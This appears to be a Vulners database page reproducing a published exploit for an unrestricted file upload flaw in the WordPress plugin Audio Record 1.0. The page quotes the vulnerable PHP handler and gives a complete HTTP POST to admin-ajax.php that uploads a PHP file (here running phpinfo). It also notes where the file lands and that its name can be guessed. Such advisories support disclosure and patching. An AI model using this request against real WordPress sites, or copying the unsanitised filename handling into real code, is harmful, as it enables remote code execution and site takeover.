Vulners
Lucene search
WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/audio-record/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.0
# Category: webapps
# Unrestricted file upload in record upload process allowing arbitrary extension.
# File: recorder.php
# Vulnerable code:
function save_record_callback() {
foreach(array('audio') as $type) {
if (isset($_FILES["${type}-blob"])) {
$fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
$path_array = wp_upload_dir();
$path = str_replace('\\', '/', $path_array['path']);
$uploadDirectory = $path . "/$fileName";
if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
echo 000;
wp_die("problem moving uploaded file");
}
# Exploitation example:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-filename"
file.php
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-blob"; filename="blob"
Content-Type: audio/wav
<?php phpinfo();
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="action"
save_record
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="course_id"
undefined
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="unit_id"
undefined
-----------------------------18311719029180117571501079851--
# Uploaded file will be located at standard WordPress media upload directory (for ex: /wp-content/uploads/year/month/).
# If directory listing is disabled - file name can be guessed due to cryptographically insecure nature of uniqid() call.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Dec 2018 00:00Current
7.4High risk
Vulners AI Score7.4